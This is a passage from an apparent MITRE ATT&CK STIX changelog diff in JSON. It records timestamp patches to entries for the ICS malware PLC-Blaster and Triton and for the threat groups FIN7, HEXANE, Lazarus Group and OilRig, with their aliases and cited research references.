+                            "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ",
+                            "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "PLC-Blaster"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-23 14:17:13.861000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-03-26 15:02:14.907000+00:00",
+                    "modified": "2026-05-12 15:12:00.736000+00:00",
+                    "name": "Triton",
+                    "description": "[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1009",
+                            "external_id": "S1009"
+                        },
+                        {
+                            "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017",
+                            "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
+                        },
+                        {
+                            "source_name": "DHS CISA February 2019",
+                            "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ",
+                            "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf"
+                        },
+                        {
+                            "source_name": "Dragos December 2017",
+                            "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ",
+                            "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf"
+                        },
+                        {
+                            "source_name": "Jos Wetzels January 2018",
+                            "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ",
+                            "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware"
+                        },
+                        {
+                            "source_name": "Julian Gutmanis March 2019",
+                            "description": "Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11 ",
+                            "url": "https://www.youtube.com/watch?v=XwSJ8hloGvY"
+                        },
+                        {
+                            "source_name": "Schneider December 2018",
+                            "description": "Schneider 2018, December 14 Security Notification  EcoStruxure Triconex Tricon V3 Retrieved. 2019/03/08 ",
+                            "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01"
+                        },
+                        {
+                            "source_name": "Schneider Electric January 2018",
+                            "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ",
+                            "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Triton",
+                        "TRISIS",
+                        "HatMan"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.736000+00:00\", \"old_value\": \"2026-04-22 20:06:22.741000+00:00\"}}}",
+                    "previous_version": "1.2"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "groups": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:09.460000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "FIN7",
+                    "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013. [FIN7](https://attack.mitre.org/groups/G0046) has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to big game hunting (BGH), including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but multiple threat groups have been observed using [Carbanak](https://attack.mitre.org/software/S0030), leading these groups to be tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)(Citation: BiZone Lizar May 2021)",
+                    "aliases": [
+                        "FIN7",
+                        "GOLD NIAGARA",
+                        "ITG14",
+                        "Carbon Spider",
+                        "ELBRUS",
+                        "Sangria Tempest"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0046",
+                            "external_id": "G0046"
+                        },
+                        {
+                            "source_name": "Carbon Spider",
+                            "description": "(Citation: CrowdStrike Carbon Spider August 2021)"
+                        },
+                        {
+                            "source_name": "FIN7",
+                            "description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)"
+                        },
+                        {
+                            "source_name": "ELBRUS",
+                            "description": "(Citation: Microsoft Ransomware as a Service)"
+                        },
+                        {
+                            "source_name": "Sangria Tempest",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "GOLD NIAGARA",
+                            "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)"
+                        },
+                        {
+                            "source_name": "Mandiant FIN7 Apr 2022",
+                            "description": "Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.",
+                            "url": "https://www.mandiant.com/resources/evolution-of-fin7"
+                        },
+                        {
+                            "source_name": "FireEye CARBANAK June 2017",
+                            "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
+                        },
+                        {
+                            "source_name": "BiZone Lizar May 2021",
+                            "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker\u2019s toolkit. Retrieved February 2, 2022.",
+                            "url": "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 April 2017",
+                            "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 Aug 2018",
+                            "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+                        },
+                        {
+                            "source_name": "Secureworks GOLD NIAGARA Threat Profile",
+                            "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 Shim Databases",
+                            "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html"
+                        },
+                        {
+                            "source_name": "Morphisec FIN7 June 2017",
+                            "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.",
+                            "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry"
+                        },
+                        {
+                            "source_name": "ITG14",
+                            "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)"
+                        },
+                        {
+                            "source_name": "CrowdStrike Carbon Spider August 2021",
+                            "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.",
+                            "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft Ransomware as a Service",
+                            "description": "Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 March 2017",
+                            "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.",
+                            "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
+                        },
+                        {
+                            "source_name": "IBM Ransomware Trends September 2020",
+                            "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.",
+                            "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Eric Loui, CrowdStrike Intelligence",
+                        "Serhii Melnyk, Trustwave SpiderLabs"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "4.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-24 03:18:58.136000+00:00\"}}}",
+                    "previous_version": "4.1"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "HEXANE",
+                    "description": "[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)",
+                    "aliases": [
+                        "HEXANE",
+                        "Lyceum",
+                        "Siamesekitten",
+                        "Spirlin"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1001",
+                            "external_id": "G1001"
+                        },
+                        {
+                            "source_name": "Spirlin",
+                            "description": "(Citation: Accenture Lyceum Targets November 2021)"
+                        },
+                        {
+                            "source_name": "Siamesekitten",
+                            "description": "(Citation: ClearSky Siamesekitten August 2021)"
+                        },
+                        {
+                            "source_name": "Lyceum",
+                            "description": "(Citation: SecureWorks August 2019)"
+                        },
+                        {
+                            "source_name": "Accenture Lyceum Targets November 2021",
+                            "description": "Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.",
+                            "url": "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns"
+                        },
+                        {
+                            "source_name": "ClearSky Siamesekitten August 2021",
+                            "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By \u201cSiamesekitten\u201d - Lyceum. Retrieved June 6, 2022.",
+                            "url": "https://www.clearskysec.com/siamesekitten/"
+                        },
+                        {
+                            "source_name": "Dragos Hexane",
+                            "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.",
+                            "url": "https://dragos.com/resource/hexane/"
+                        },
+                        {
+                            "source_name": "Kaspersky Lyceum October 2021",
+                            "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.",
+                            "url": "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf"
+                        },
+                        {
+                            "source_name": "SecureWorks August 2019",
+                            "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 ",
+                            "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence",
+                        "Mindaugas Gudzis, BT Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.3",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-08-14 15:24:19.141000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.3"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:03.807000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Lazarus Group",
+                    "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). (Citation: US-CERT HIDDEN COBRA June 2017) (Citation: Treasury North Korean Cyber Groups September 2019) [Lazarus Group](https://attack.mitre.org/groups/G0032) has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster)\n\nNorth Korea\u2019s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses \u201cLazarus Group\u201d as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.(Citation: Mandiant DPRK Laz Org Breakdown 2022)(Citation: Mandiant DPRK Groups 2023)(Citation: JPCert Blog Laz Subgroups 2025)\n\n",
+                    "aliases": [
+                        "Lazarus Group",
+                        "Labyrinth Chollima",
+                        "HIDDEN COBRA",
+                        "Guardians of Peace",
+                        "ZINC",
+                        "NICKEL ACADEMY",
+                        "Diamond Sleet"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0032",
+                            "external_id": "G0032"
+                        },
+                        {
+                            "source_name": "Labyrinth Chollima",
+                            "description": "(Citation: CrowdStrike Labyrinth Chollima Feb 2022)"
+                        },
+                        {
+                            "source_name": "Diamond Sleet",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "ZINC",
+                            "description": "(Citation: Microsoft ZINC disruption Dec 2017)"
+                        },
+                        {
+                            "source_name": "Lazarus Group",
+                            "description": "(Citation: Novetta Blockbuster)"
+                        },
+                        {
+                            "source_name": "NICKEL ACADEMY",
+                            "description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)"
+                        },
+                        {
+                            "source_name": "Guardians of Peace",
+                            "description": "(Citation: US-CERT HIDDEN COBRA June 2017)"
+                        },
+                        {
+                            "source_name": "CrowdStrike Labyrinth Chollima Feb 2022",
+                            "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.",
+                            "url": "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/"
+                        },
+                        {
+                            "source_name": "Mandiant DPRK Groups 2023",
+                            "description": "Michael Barnhart, Austin Larsen, Jeff Johnson, Taylor Long, Michelle Cantos, Adrian Hernandez. (2023, October 10). Assessed Cyber Structure and Alignments of North Korea in 2023. Retrieved August 25, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023"
+                        },
+                        {
+                            "source_name": "Mandiant DPRK Laz Org Breakdown 2022",
+                            "description": "Michael Barnhart, Michelle Cantos, Jeffery Johnson, Elias fox, Gary Freas, Dan Scott. (2022, March 23). Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations. Retrieved September 9, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.",
+                            "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"
+                        },
+                        {
+                            "source_name": "Secureworks NICKEL ACADEMY Dec 2017",
+                            "description": "Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.",
+                            "url": "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing"
+                        },
+                        {
+                            "source_name": "Microsoft ZINC disruption Dec 2017",
+                            "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.",
+                            "url": "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/"
+                        },
+                        {
+                            "source_name": "HIDDEN COBRA",
+                            "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)"
+                        },
+                        {
+                            "source_name": "Treasury North Korean Cyber Groups September 2019",
+                            "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.",
+                            "url": "https://home.treasury.gov/news/press-releases/sm774"
+                        },
+                        {
+                            "source_name": "US-CERT HIDDEN COBRA June 2017",
+                            "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA \u2013 North Korea\u2019s DDoS Botnet Infrastructure. Retrieved July 13, 2017.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+                        },
+                        {
+                            "source_name": "US-CERT HOPLIGHT Apr 2019",
+                            "description": "US-CERT. (2019, April 10). MAR-10135536-8 \u2013 North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+                        },
+                        {
+                            "source_name": "JPCert Blog Laz Subgroups 2025",
+                            "description": "\u4f50\u3005\u6728\u52c7\u4eba Hayato Sasaki. (2025, March 25). Tempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus\u2019s Subgroup. Retrieved August 25, 2025.",
+                            "url": "https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Kyaw Pyiyt Htet, @KyawPyiytHtet",
+                        "Dragos Threat Intelligence",
+                        "MyungUk Han, ASEC",
+                        "Jun Hirata, NEC Corporation",
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Pooja Natarajan, NEC Corporation India"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "5.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-24 01:29:21.748000+00:00\"}}}",
+                    "previous_version": "5.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-12-14 16:46:06.044000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "OilRig",
+                    "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)",
+                    "aliases": [
+                        "OilRig",
+                        "COBALT GYPSY",
+                        "IRN2",
+                        "APT34",
+                        "Helix Kitten",
+                        "Evasive Serpens",
+                        "Hazel Sandstorm",
+                        "EUROPIUM",
+                        "ITG13",
+                        "Earth Simnavaz",
+                        "Crambus",
+                        "TA452"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0049",
+                            "external_id": "G0049"
+                        },
+                        {
+                            "source_name": "IRN2",
+                            "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)"
+                        },
+                        {
+                            "source_name": "ITG13",
+                            "description": "(Citation: IBM ZeroCleare Wiper December 2019)"
+                        },
+                        {
+                            "source_name": "Hazel Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "EUROPIUM",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "OilRig",
+                            "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)"
+                        },
+                        {
+                            "source_name": "TA452",
+                            "description": "(Citation: Proofpoint Iranian Aligned Attacks JAN 2020)"
+                        },
+                        {
+                            "source_name": "COBALT GYPSY",
+                            "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)"
+                        },
+                        {
+                            "source_name": "Crambus",
+                            "description": "(Citation: Symantec Crambus OCT 2023)"
+                        },
+                        {
+                            "source_name": "Earth Simnavaz",
+                            "description": "(Citation: Trend Micro Earth Simnavaz October 2024)"
+                        },
+                        {
+                            "source_name": "Helix Kitten",
+                            "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)"
+                        },
+                        {
+                            "source_name": "Evasive Serpens",
+                            "description": "(Citation: Unit42 OilRig Playbook 2023)"
+                        },
+                        {
+                            "source_name": "Check Point APT34 April 2021",
+                            "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.",
+                            "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/"
+                        },
+                        {
+                            "source_name": "ClearSky OilRig Jan 2017",
+                            "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.",
+                            "url": "http://www.clearskysec.com/oilrig/"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Simnavaz October 2024",
+                            "description": "Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html"
+                        },
+                        {
+                            "source_name": "Palo Alto OilRig May 2016",
+                            "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/"
+                        },
+                        {
+                            "source_name": "Palo Alto OilRig April 2017",
+                            "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/"
+                        },
+                        {
+                            "source_name": "Palo Alto OilRig Oct 2016",
+                            "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
